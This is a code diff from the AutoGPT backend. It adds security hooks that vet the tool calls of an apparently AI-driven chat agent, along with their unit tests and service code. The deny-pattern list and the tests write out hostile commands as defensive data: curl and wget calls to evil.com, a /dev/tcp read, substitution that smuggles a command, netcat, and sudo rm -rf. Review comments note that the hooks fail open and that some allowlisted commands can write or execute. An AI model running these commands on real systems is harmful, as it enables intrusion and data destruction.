+    assert isinstance(results[2], StreamFinish)
+
+
+def test_result_error_emits_error_and_finish():
+    adapter = _adapter()
+    msg = ResultMessage(
+        subtype="error",
+        duration_ms=100,
+        duration_api_ms=50,
+        is_error=True,
+        num_turns=0,
+        session_id="s1",
+        result="API rate limited",
+    )
+    results = adapter.convert_message(msg)
+    # No step was open, so no FinishStep — just Error + Finish
+    assert len(results) == 2
+    assert isinstance(results[0], StreamError)
+    assert "API rate limited" in results[0].errorText
+    assert isinstance(results[1], StreamFinish)
+
+
+# -- Text after tools (new block ID) ----------------------------------------
+
+
+def test_text_after_tool_gets_new_block_id():
+    adapter = _adapter()
+    # Text -> Tool -> ToolResult -> Text should get a new text block ID and step
+    adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="before")], model="test")
+    )
+    adapter.convert_message(
+        AssistantMessage(
+            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+            model="test",
+        )
+    )
+    # Send tool result (closes step)
+    adapter.convert_message(
+        UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
+    )
+    results = adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="after")], model="test")
+    )
+    # Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
+    assert len(results) == 3
+    assert isinstance(results[0], StreamStartStep)
+    assert isinstance(results[1], StreamTextStart)
+    assert isinstance(results[2], StreamTextDelta)
+    assert results[2].delta == "after"
+
+
+# -- Full conversation flow --------------------------------------------------
+
+
+def test_full_conversation_flow():
+    """Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
+    adapter = _adapter()
+    all_responses: list[StreamBaseResponse] = []
+
+    # 1. Init
+    all_responses.extend(
+        adapter.convert_message(SystemMessage(subtype="init", data={}))
+    )
+    # 2. Assistant text
+    all_responses.extend(
+        adapter.convert_message(
+            AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
+        )
+    )
+    # 3. Tool use
+    all_responses.extend(
+        adapter.convert_message(
+            AssistantMessage(
+                content=[
+                    ToolUseBlock(
+                        id="t1",
+                        name=f"{MCP_TOOL_PREFIX}find_agent",
+                        input={"query": "email"},
+                    )
+                ],
+                model="test",
+            )
+        )
+    )
+    # 4. Tool result
+    all_responses.extend(
+        adapter.convert_message(
+            UserMessage(
+                content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
+            )
+        )
+    )
+    # 5. More text
+    all_responses.extend(
+        adapter.convert_message(
+            AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
+        )
+    )
+    # 6. Result
+    all_responses.extend(
+        adapter.convert_message(
+            ResultMessage(
+                subtype="success",
+                duration_ms=500,
+                duration_api_ms=400,
+                is_error=False,
+                num_turns=2,
+                session_id="s1",
+            )
+        )
+    )
+
+    types = [type(r).__name__ for r in all_responses]
+    assert types == [
+        "StreamStart",
+        "StreamStartStep",  # step 1: text + tool call
+        "StreamTextStart",
+        "StreamTextDelta",  # "Let me search"
+        "StreamTextEnd",  # closed before tool
+        "StreamToolInputStart",
+        "StreamToolInputAvailable",
+        "StreamToolOutputAvailable",  # tool result
+        "StreamFinishStep",  # step 1 closed after tool result
+        "StreamStartStep",  # step 2: continuation text
+        "StreamTextStart",  # new block after tool
+        "StreamTextDelta",  # "I found 2"
+        "StreamTextEnd",  # closed by result
+        "StreamFinishStep",  # step 2 closed
+        "StreamFinish",
+    ]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks.py
@@ -0,0 +1,393 @@
+"""Security hooks for Claude Agent SDK integration.
+
+This module provides security hooks that validate tool calls before execution,
+ensuring multi-user isolation and preventing unauthorized operations.
+"""
+
+import json
+import logging
+import os
+import re
+import shlex
+from typing import Any, cast
+
+from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
+
+logger = logging.getLogger(__name__)
+
+# Tool names rejected outright by _validate_tool_access (CLI/system access).
+BLOCKED_TOOLS = {
+    "bash",
+    "shell",
+    "exec",
+    "terminal",
+    "command",
+}
+
+# Commands the sandboxed Bash tool may run (data processing / inspection).
+# NOTE(review): not all are read-only — tee, sed, find, awk, xargs can write/exec.
+ALLOWED_BASH_COMMANDS = {
+    # JSON / structured data
+    "jq",
+    # Text processing
+    "grep",
+    "egrep",
+    "fgrep",
+    "rg",
+    "head",
+    "tail",
+    "cat",
+    "wc",
+    "sort",
+    "uniq",
+    "cut",
+    "tr",
+    "sed",
+    "awk",
+    "column",
+    "fold",
+    "fmt",
+    "nl",
+    "paste",
+    "rev",
+    # File inspection (read-only)
+    "find",
+    "ls",
+    "file",
+    "stat",
+    "du",
+    "tree",
+    "basename",
+    "dirname",
+    "realpath",
+    # Utilities
+    "echo",
+    "printf",
+    "date",
+    "true",
+    "false",
+    "xargs",
+    "tee",
+    # Comparison / encoding
+    "diff",
+    "comm",
+    "base64",
+    "md5sum",
+    "sha256sum",
+}
+
+# Tools allowed only when their path argument stays within the SDK workspace.
+# The SDK uses these to handle oversized tool results (writes to tool-results/
+# files, then reads them back) and for workspace file operations.
+WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
+
+# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
+SANDBOXED_BASH_TOOLS = {"Bash"}
+
+# Regexes searched case-insensitively in the JSON-encoded input of other tools.
+DANGEROUS_PATTERNS = [
+    r"sudo",
+    r"rm\s+-rf",
+    r"dd\s+if=",
+    r"/etc/passwd",
+    r"/etc/shadow",
+    r"chmod\s+777",
+    r"curl\s+.*\|.*sh",
+    r"wget\s+.*\|.*sh",
+    r"eval\s*\(",
+    r"exec\s*\(",
+    r"__import__",
+    r"os\.system",
+    r"subprocess",
+]
+
+
+def _deny(reason: str) -> dict[str, Any]:
+    """Build a PreToolUse hook response that denies the call with ``reason``."""
+    decision = {
+        "hookEventName": "PreToolUse",
+        "permissionDecision": "deny",
+        "permissionDecisionReason": reason,
+    }
+    # Wrap the decision under the ``hookSpecificOutput`` key.
+    return {"hookSpecificOutput": decision}
+
+
+def _validate_workspace_path(
+    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
+) -> dict[str, Any]:
+    """Validate that a workspace-scoped tool only accesses allowed paths.
+
+    Allowed: the SDK working directory and ``~/.claude/projects/…/tool-results/``.
+    Paths are normalised lexically (symlinks are not resolved). Returns ``{}``
+    to allow the call, otherwise a ``_deny`` payload.
+    """
+    path = tool_input.get("file_path") or tool_input.get("path") or ""
+    if not path:
+        # Glob/Grep without a path default to cwd which is already sandboxed
+        return {}
+
+    resolved = os.path.normpath(os.path.expanduser(path))
+
+    # Allow access within the SDK working directory
+    if sdk_cwd:
+        norm_cwd = os.path.normpath(sdk_cwd)
+        if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
+            return {}
+
+    # Allow ~/.claude/projects/*/tool-results/ — as a path component, not a substring.
+    claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects")) + os.sep
+    if resolved.startswith(claude_dir) and "tool-results" in resolved.split(os.sep):
+        return {}
+
+    logger.warning(
+        f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
+    )
+    return _deny(
+        f"Tool '{tool_name}' can only access files within the workspace directory."
+    )
+
+
+def _validate_bash_command(
+    tool_input: dict[str, Any], sdk_cwd: str | None
+) -> dict[str, Any]:
+    """Validate a Bash command against the allowlist of safe commands.
+
+    Every command of a pipeline/list must be in ``ALLOWED_BASH_COMMANDS``.
+    Command substitution, output redirection, ``/dev/`` access and absolute
+    paths outside the workspace are denied. Returns ``{}`` when allowed.
+    """
+    command = tool_input.get("command", "")
+    if not command or not isinstance(command, str):
+        return _deny("Bash command is empty.")
+    # Block command substitution — can smuggle arbitrary commands
+    if "$(" in command or "`" in command:
+        return _deny("Command substitution ($() or ``) is not allowed in Bash.")
+    # Block output redirection — Bash should be read-only
+    if re.search(r"(?<!\d)>{1,2}\s", command):
+        return _deny("Output redirection (> or >>) is not allowed in Bash.")
+    # Block /dev/ access (e.g., /dev/tcp for network)
+    if "/dev/" in command:
+        return _deny("Access to /dev/ is not allowed in Bash.")
+    # shlex.split() only breaks on whitespace, so "cat x;rm y" would hide ``rm``
+    # in the token "x;rm". Punctuation mode splits out operator runs (newline
+    # included, it acts like ";") while quoted text such as a jq "|" stays intact.
+    punctuation = "();<>|&\n"
+    source = command.replace("\\\n", "")  # backslash-newline is a line continuation
+    try:
+        lexer = shlex.shlex(source, posix=True, punctuation_chars=punctuation)
+        lexer.whitespace, lexer.whitespace_split, lexer.commenters = " \t\r", True, ""
+        tokens = list(lexer)
+    except ValueError:
+        return _deny("Malformed command (unmatched quotes).")
+
+    # Walk tokens: the first non-assignment token after a separator is a command.
+    expect_command = True
+    for token in tokens:
+        if token and not token.strip(punctuation) and token.strip("()"):
+            # Plain redirections (<, >&) don't start a command; other operators do.
+            if token[0] not in "<>" or any(ch in "();\n" for ch in token):
+                expect_command = True
+            continue
+        if expect_command:
+            # Skip env var assignments (VAR=value)
+            if "=" in token and not token.startswith("-"):
+                continue
+            cmd_name = os.path.basename(token)
+            if cmd_name not in ALLOWED_BASH_COMMANDS:
+                logger.warning(f"Blocked Bash command: {cmd_name}")
+                return _deny(
+                    f"Command '{cmd_name}' is not allowed. "
+                    f"Allowed commands: {', '.join(sorted(ALLOWED_BASH_COMMANDS))}"
+                )
+            expect_command = False
+
+    # Absolute paths must stay in the workspace or a tool-results directory
+    if sdk_cwd:
+        norm_cwd = os.path.normpath(sdk_cwd)
+        claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects")) + os.sep
+        for token in tokens:
+            if not token.startswith("/"):
+                continue
+            norm = os.path.normpath(token)
+            if norm.startswith(norm_cwd + os.sep) or norm == norm_cwd:
+                continue
+            if norm.startswith(claude_dir) and "tool-results" in norm.split(os.sep):
+                continue
+            logger.warning(f"Blocked Bash path outside workspace: {token}")
+            return _deny(
+                f"Bash can only access files within the workspace directory. "
+                f"Path '{token}' is outside the workspace."
+            )
+
+    return {}
+
+
+def _validate_tool_access(
+    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
+) -> dict[str, Any]:
+    """Decide whether a tool call may proceed.
+
+    Returns:
+        ``{}`` when the call is allowed, otherwise a ``hookSpecificOutput``
+        denial payload.
+    """
+    # Hard-blocked tools are rejected before any input inspection.
+    if tool_name in BLOCKED_TOOLS:
+        logger.warning(f"Blocked tool access attempt: {tool_name}")
+        reason = (
+            f"Tool '{tool_name}' is not available. "
+            "Use the CoPilot-specific tools instead."
+        )
+        return _deny(reason)
+
+    # Bash goes through the command allowlist and workspace path checks.
+    if tool_name in SANDBOXED_BASH_TOOLS:
+        return _validate_bash_command(tool_input, sdk_cwd)
+    # File tools only need their path argument confined to the workspace.
+    if tool_name in WORKSPACE_SCOPED_TOOLS:
+        return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
+
+    # Everything else: scan the JSON-encoded input (predictable format, unlike
+    # ``str()`` which yields a Python repr) for known-dangerous patterns.
+    serialized = json.dumps(tool_input) if tool_input else ""
+    hit = next(
+        (p for p in DANGEROUS_PATTERNS if re.search(p, serialized, re.IGNORECASE)),
+        None,
+    )
+    if hit is None:
+        return {}
+    logger.warning(f"Blocked dangerous pattern in tool input: {hit} in {tool_name}")
+    return _deny("Input contains blocked pattern")
+
+
+def _validate_user_isolation(
+    tool_name: str, tool_input: dict[str, Any], user_id: str | None
+) -> dict[str, Any]:
+    """Validate that tool calls respect user isolation.
+
+    Only tools whose name contains "workspace" are checked: their ``path`` /
+    ``file_path`` argument must be relative and free of ``..``.
+
+    Args:
+        tool_name: Tool name; matched case-insensitively.
+        user_id: Current user, used only in the warning log.
+
+    Returns:
+        ``{}`` to allow, or a ``_deny`` payload on a traversal attempt.
+    """
+    if "workspace" not in tool_name.lower():
+        return {}
+    path = tool_input.get("path", "") or tool_input.get("file_path", "")
+    if path and (".." in path or path.startswith("/")):
+        logger.warning(f"Blocked path traversal attempt: {path} by user {user_id}")
+        return _deny("Path traversal not allowed")
+    return {}
+
+
+def create_security_hooks(
+    user_id: str | None, sdk_cwd: str | None = None
+) -> dict[str, Any]:
+    """Create the security hooks configuration for Claude Agent SDK.
+
+    Includes security validation and observability hooks:
+    - PreToolUse: Security validation before tool execution
+    - PostToolUse: Log successful tool executions
+    - PostToolUseFailure: Log and handle failed tool executions
+    - PreCompact: Log context compaction events (SDK handles compaction automatically)
+
+    Args:
+        user_id: Current user ID for isolation validation
+        sdk_cwd: SDK working directory for workspace-scoped tool validation
+
+    Returns:
+        Hooks configuration dict for ClaudeAgentOptions; empty if the SDK is missing
+    """
+    try:
+        from claude_agent_sdk import HookMatcher
+        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
+
+        async def pre_tool_use_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Combined pre-tool-use validation hook."""
+            _ = context  # unused but required by signature
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
+
+            # Strip MCP prefix for consistent validation
+            is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
+            clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
+
+            # Only block non-CoPilot tools; our MCP-registered tools
+            # (including Read for oversized results) are already sandboxed.
+            if not is_copilot_tool:
+                result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
+                if result:
+                    return cast(SyncHookJSONOutput, result)
+
+            # Validate user isolation (runs for CoPilot tools as well)
+            result = _validate_user_isolation(clean_name, tool_input, user_id)
+            if result:
+                return cast(SyncHookJSONOutput, result)
+
+            logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
+            return cast(SyncHookJSONOutput, {})
+
+        async def post_tool_use_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log successful tool executions for observability."""
+            _ = context
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
+            return cast(SyncHookJSONOutput, {})
+
+        async def post_tool_failure_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log failed tool executions for debugging."""
+            _ = context
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            error = input_data.get("error", "Unknown error")
+            logger.warning(
+                f"[SDK] Tool failed: {tool_name}, error={error}, "
+                f"user={user_id}, tool_use_id={tool_use_id}"
+            )
+            return cast(SyncHookJSONOutput, {})
+
+        async def pre_compact_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log when SDK triggers context compaction.
+
+            The SDK automatically compacts conversation history when it grows too large.
+            This hook provides visibility into when compaction happens.
+            """
+            _ = context, tool_use_id
+            trigger = input_data.get("trigger", "auto")
+            logger.info(
+                f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
+            )
+            return cast(SyncHookJSONOutput, {})
+
+        return {
+            "PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
+            "PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
+            "PostToolUseFailure": [
+                HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
+            ],
+            "PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
+        }
+    except ImportError:
+        # NOTE(review): fails open — without the SDK no security hooks are installed.
+        logger.warning("claude-agent-sdk not available, security hooks disabled")
+        return {}
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks_test.py
@@ -0,0 +1,258 @@
+"""Unit tests for SDK security hooks."""
+
+import os
+
+from .security_hooks import _validate_tool_access, _validate_user_isolation
+
+SDK_CWD = "/tmp/copilot-abc123"
+
+
+def _is_denied(result: dict) -> bool:
+    """Return True when the hook result carries a ``deny`` permission decision."""
+    return result.get("hookSpecificOutput", {}).get("permissionDecision") == "deny"
+
+
+# -- Blocked tools -----------------------------------------------------------
+
+
+def test_blocked_tools_denied():
+    """Each of these shell-like tool names is denied, even with empty input."""
+    for tool in ("bash", "shell", "exec", "terminal", "command"):
+        assert _is_denied(_validate_tool_access(tool, {})), f"{tool} should be blocked"
+
+
+def test_unknown_tool_allowed():
+    """A tool name with no dedicated rule yields an empty (allow) result."""
+    assert _validate_tool_access("SomeCustomTool", {}) == {}
+
+
+# -- Workspace-scoped tools --------------------------------------------------
+
+
+def test_read_within_workspace_allowed():
+    """Read on a file under the session cwd is allowed."""
+    tool_input = {"file_path": f"{SDK_CWD}/file.txt"}
+    outcome = _validate_tool_access("Read", tool_input, sdk_cwd=SDK_CWD)
+    assert outcome == {}
+
+
+def test_write_within_workspace_allowed():
+    """Write to a file under the session cwd is allowed."""
+    tool_input = {"file_path": f"{SDK_CWD}/output.json"}
+    outcome = _validate_tool_access("Write", tool_input, sdk_cwd=SDK_CWD)
+    assert outcome == {}
+
+
+def test_edit_within_workspace_allowed():
+    """Edit of a nested file under the session cwd is allowed."""
+    tool_input = {"file_path": f"{SDK_CWD}/src/main.py"}
+    outcome = _validate_tool_access("Edit", tool_input, sdk_cwd=SDK_CWD)
+    assert outcome == {}
+
+
+def test_glob_within_workspace_allowed():
+    tool_input = {"path": f"{SDK_CWD}/src"}
+    assert _validate_tool_access("Glob", tool_input, sdk_cwd=SDK_CWD) == {}
+
+
+def test_grep_within_workspace_allowed():
+    tool_input = {"path": f"{SDK_CWD}/src"}
+    assert _validate_tool_access("Grep", tool_input, sdk_cwd=SDK_CWD) == {}
+
+
+def test_read_outside_workspace_denied():
+    """Read on an absolute path outside the session cwd is denied."""
+    tool_input = {"file_path": "/etc/passwd"}
+    outcome = _validate_tool_access("Read", tool_input, sdk_cwd=SDK_CWD)
+    assert _is_denied(outcome)
+
+
+def test_write_outside_workspace_denied():
+    """Write to an absolute path outside the session cwd is denied."""
+    tool_input = {"file_path": "/home/user/secrets.txt"}
+    outcome = _validate_tool_access("Write", tool_input, sdk_cwd=SDK_CWD)
+    assert _is_denied(outcome)
+
+
+def test_traversal_attack_denied():
+    """A path that starts under the cwd but climbs out via ``..`` is denied."""
+    escaping_path = f"{SDK_CWD}/../../etc/passwd"
+    outcome = _validate_tool_access(
+        "Read", {"file_path": escaping_path}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(outcome)
+
+
+def test_no_path_allowed():
+    """Glob/Grep without a path argument defaults to cwd — should pass."""
+    no_arguments: dict = {}
+    assert _validate_tool_access("Glob", no_arguments, sdk_cwd=SDK_CWD) == {}
+
+
+def test_read_no_cwd_denies_absolute():
+    """When sdk_cwd is not passed, an absolute path is denied."""
+    outcome = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
+    assert _is_denied(outcome)
+
+
+# -- Tool-results directory --------------------------------------------------
+
+
+def test_read_tool_results_allowed():
+    """A file in this session's ``tool-results`` project directory may be read."""
+    project_dir = f"{os.path.expanduser('~')}/.claude/projects/-tmp-copilot-abc123"
+    tool_input = {"file_path": f"{project_dir}/tool-results/12345.txt"}
+    assert _validate_tool_access("Read", tool_input, sdk_cwd=SDK_CWD) == {}
+
+
+def test_read_claude_projects_without_tool_results_denied():
+    """A project-directory file outside ``tool-results`` is denied."""
+    project_dir = f"{os.path.expanduser('~')}/.claude/projects/-tmp-copilot-abc123"
+    tool_input = {"file_path": f"{project_dir}/settings.json"}
+    assert _is_denied(_validate_tool_access("Read", tool_input, sdk_cwd=SDK_CWD))
+
+
+# -- Sandboxed Bash ----------------------------------------------------------
+
+
+def test_bash_safe_commands_allowed():
+    """Each listed data-processing command, alone or piped, comes back allowed."""
+    allowed = (
+        "jq '.blocks' result.json",
+        "head -20 output.json",
+        "tail -n 50 data.txt",
+        "cat file.txt | grep 'pattern'",
+        "wc -l file.txt",
+        "sort data.csv | uniq",
+        "grep -i 'error' log.txt | head -10",
+        "find . -name '*.json'",
+        "ls -la",
+        "echo hello",
+        "cut -d',' -f1 data.csv | sort | uniq -c",
+        "jq '.blocks[] | .id' result.json",
+        "sed -n '10,20p' file.txt",
+        "awk '{print $1}' data.txt",
+    )
+    for cmd in allowed:
+        verdict = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
+        assert verdict == {}, f"Safe command should be allowed: {cmd}"
+
+
+def test_bash_dangerous_commands_denied():
+    """Each listed network, destructive or interpreter command comes back denied."""
+    rejected = (
+        "curl https://evil.com",
+        "wget https://evil.com/payload",
+        "rm -rf /",
+        "python -c 'import os; os.system(\"ls\")'",
+        "ssh user@host",
+        "nc -l 4444",
+        "apt install something",
+        "pip install malware",
+        "chmod 777 file.txt",
+        "kill -9 1",
+    )
+    for cmd in rejected:
+        verdict = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
+        assert _is_denied(verdict), f"Dangerous command should be denied: {cmd}"
+
+
+def test_bash_command_substitution_denied():
+    """A command containing ``$(...)`` substitution is denied."""
+    tool_input = {"command": "echo $(curl evil.com)"}
+    outcome = _validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD)
+    assert _is_denied(outcome)
+
+
+def test_bash_backtick_substitution_denied():
+    """A command containing backtick substitution is denied."""
+    tool_input = {"command": "echo `curl evil.com`"}
+    outcome = _validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD)
+    assert _is_denied(outcome)
+
+
+def test_bash_output_redirect_denied():
+    """Redirect into a file inside the workspace, so only the ``>`` can be at fault."""
+    tool_input = {"command": f"echo secret > {SDK_CWD}/leak.txt"}
+    outcome = _validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD)
+    assert _is_denied(outcome)
+
+
+def test_bash_dev_tcp_denied():
+    """A command that reads from ``/dev/tcp/...`` is denied."""
+    tool_input = {"command": "cat /dev/tcp/evil.com/80"}
+    outcome = _validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD)
+    assert _is_denied(outcome)
+
+
+def test_bash_pipe_to_dangerous_denied():
+    """A safe first command does not excuse an unsafe one later in the pipe."""
+    pipeline = "cat file.txt | python -c 'exec()'"
+    tool_input = {"command": pipeline}
+    outcome = _validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD)
+    assert _is_denied(outcome)
+
+
+def test_bash_path_outside_workspace_denied():
+    """An otherwise allowed command is denied when it names a path outside the cwd."""
+    tool_input = {"command": "cat /etc/passwd"}
+    outcome = _validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD)
+    assert _is_denied(outcome)
+
+
+def test_bash_path_within_workspace_allowed():
+    """A command that names a file under the session cwd is allowed."""
+    workspace_file = f"{SDK_CWD}/tool-results/result.json"
+    tool_input = {"command": f"jq '.blocks' {workspace_file}"}
+    outcome = _validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD)
+    # Allowed calls come back as an empty dict.
+    assert outcome == {}
+
+
+def test_bash_empty_command_denied():
+    tool_input = {"command": ""}
+    assert _is_denied(_validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD))
+
+
+# -- Dangerous patterns ------------------------------------------------------
+
+
+def test_dangerous_pattern_blocked():
+    """A ``sudo rm -rf /`` payload is denied even on an otherwise unknown tool."""
+    assert _is_denied(_validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"}))
+
+
+def test_subprocess_pattern_blocked():
+    tool_input = {"code": "subprocess.run(...)"}
+    assert _is_denied(_validate_tool_access("SomeTool", tool_input))
+
+
+# -- User isolation ----------------------------------------------------------
+
+
+def test_workspace_path_traversal_blocked():
+    """A relative ``..`` path given to a workspace tool is denied."""
+    tool_input = {"path": "../../../etc/shadow"}
+    outcome = _validate_user_isolation("workspace_read", tool_input, user_id="user-1")
+    assert _is_denied(outcome)
+
+
+def test_workspace_absolute_path_blocked():
+    """An absolute path given to a workspace tool is denied."""
+    tool_input = {"path": "/etc/passwd"}
+    outcome = _validate_user_isolation("workspace_read", tool_input, user_id="user-1")
+    assert _is_denied(outcome)
+
+
+def test_workspace_normal_path_allowed():
+    """A plain relative path given to a workspace tool is allowed."""
+    tool_input = {"path": "src/main.py"}
+    outcome = _validate_user_isolation("workspace_read", tool_input, user_id="user-1")
+    assert outcome == {}
+
+
+def test_non_workspace_tool_passes_isolation():
+    """A ``find_agent`` call with a plain query passes the isolation check."""
+    tool_input = {"query": "email"}
+    outcome = _validate_user_isolation("find_agent", tool_input, user_id="user-1")
+    assert outcome == {}
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/service.py
@@ -0,0 +1,556 @@
+"""Claude Agent SDK service layer for CoPilot chat completions."""
+
+import asyncio
+import json
+import logging
+import os
+import re
+import uuid
+from collections.abc import AsyncGenerator
+from typing import Any
+
+from backend.util.exceptions import NotFoundError
+
+from ..config import ChatConfig
+from ..model import (
+    ChatMessage,
+    ChatSession,
+    Usage,
+    get_chat_session,
+    update_session_title,
+    upsert_chat_session,
+)
+from ..response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamStart,
+    StreamTextDelta,
+    StreamToolInputAvailable,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from ..service import _build_system_prompt, _generate_session_title
+from ..tracking import track_user_message
+from .anthropic_fallback import stream_with_anthropic
+from .response_adapter import SDKResponseAdapter
+from .security_hooks import create_security_hooks
+from .tool_adapter import (
+    COPILOT_TOOL_NAMES,
+    create_copilot_mcp_server,
+    set_execution_context,
+)
+from .tracing import TracedSession, create_tracing_hooks, merge_hooks
+
+logger = logging.getLogger(__name__)
+config = ChatConfig()
+
+# Set to hold background tasks to prevent garbage collection
+_background_tasks: set[asyncio.Task[Any]] = set()
+
+
+_SDK_CWD_PREFIX = "/tmp/copilot-"
+
+# Appended to the system prompt to inform the agent about Bash restrictions.
+# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
+# but it doesn't know about our security hooks' command allowlist for Bash.
+_SDK_TOOL_SUPPLEMENT = """
+
+## Bash restrictions
+
+The Bash tool is restricted to safe, read-only data-processing commands:
+jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
+echo, diff, base64, and similar utilities.
+Network commands (curl, wget), destructive commands (rm, chmod), and
+interpreters (python, node) are NOT available.
+"""
+
+
+def _resolve_sdk_model() -> str | None:
+    """Pick the model name to pass to the Claude Agent SDK CLI.
+
+    ``config.claude_agent_model`` wins when it is truthy. Otherwise
+    ``config.model`` is used with everything up to its first ``/`` removed,
+    e.g. ``"anthropic/claude-opus-4.6"`` becomes ``"claude-opus-4.6"``.
+    """
+    explicit = config.claude_agent_model
+    if explicit:
+        return explicit
+    full_name = config.model
+    _provider, separator, bare_name = full_name.partition("/")
+    return bare_name if separator else full_name
+
+
+def _build_sdk_env() -> dict[str, str]:
+    """Build env vars for the SDK CLI process.
+
+    Routes API calls through OpenRouter (or a custom base_url) using
+    the same ``config.api_key`` / ``config.base_url`` as the non-SDK path.
+
+    Returns:
+        ``ANTHROPIC_BASE_URL``, ``ANTHROPIC_AUTH_TOKEN`` and an empty
+        ``ANTHROPIC_API_KEY`` when both an API key and an ``http://`` or
+        ``https://`` base URL are configured; otherwise an empty dict so the
+        SDK falls back to its default credentials.
+    """
+    if not (config.api_key and config.base_url):
+        return {}
+    # The SDK expects the base URL without a trailing slash or /v1 version path.
+    base = config.base_url.strip().rstrip("/").removesuffix("/v1").rstrip("/")
+    # Require a real scheme: a bare "http" prefix also matches e.g. "httpfoo".
+    if not base.lower().startswith(("http://", "https://")):
+        return {}
+    return {
+        "ANTHROPIC_BASE_URL": base,
+        "ANTHROPIC_AUTH_TOKEN": config.api_key,
+        # Must be explicitly empty so the CLI uses AUTH_TOKEN instead
+        "ANTHROPIC_API_KEY": "",
+    }
+
+
+def _make_sdk_cwd(session_id: str) -> str:
+    """Create a safe, session-specific working directory path.
+
+    Sanitizes session_id, then validates the resulting path stays under /tmp/
+    using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
+
+    Raises:
+        ValueError: If nothing remains of ``session_id`` after sanitization, or
+            the normalized path no longer starts with ``_SDK_CWD_PREFIX``.
+    """
+    # Step 1: Sanitize - only allow alphanumeric and hyphens
+    safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
+    if not safe_id:
+        raise ValueError("Session ID is empty after sanitization")
+
+    # Step 2: Construct path with known-safe prefix
+    cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
+
+    # Step 3: Validate with an explicit raise; a bare assert vanishes under -O
+    if not cwd.startswith(_SDK_CWD_PREFIX):
+        raise ValueError(f"Session path escaped prefix: {cwd}")
+    return cwd
+
+
+def _cleanup_sdk_tool_results(cwd: str) -> None:
+    """Remove SDK tool-result files for a specific session working directory.
+
+    The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
+    We clean only the specific cwd's results to avoid race conditions between
+    concurrent sessions, then delete the temporary cwd directory itself.
+    A file that cannot be removed is logged at debug level, not raised.
+
+    Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
+    """
+    import shutil
+
+    # Security check 1: Validate cwd is under the expected prefix
+    normalized = os.path.normpath(cwd)
+    if not normalized.startswith(_SDK_CWD_PREFIX):
+        logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
+        return
+
+    # Security check 2: Ensure no path traversal in the normalized path
+    if ".." in normalized:
+        logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
+        return
+
+    # SDK encodes the cwd path by replacing '/' with '-'
+    encoded_cwd = normalized.replace("/", "-")
+
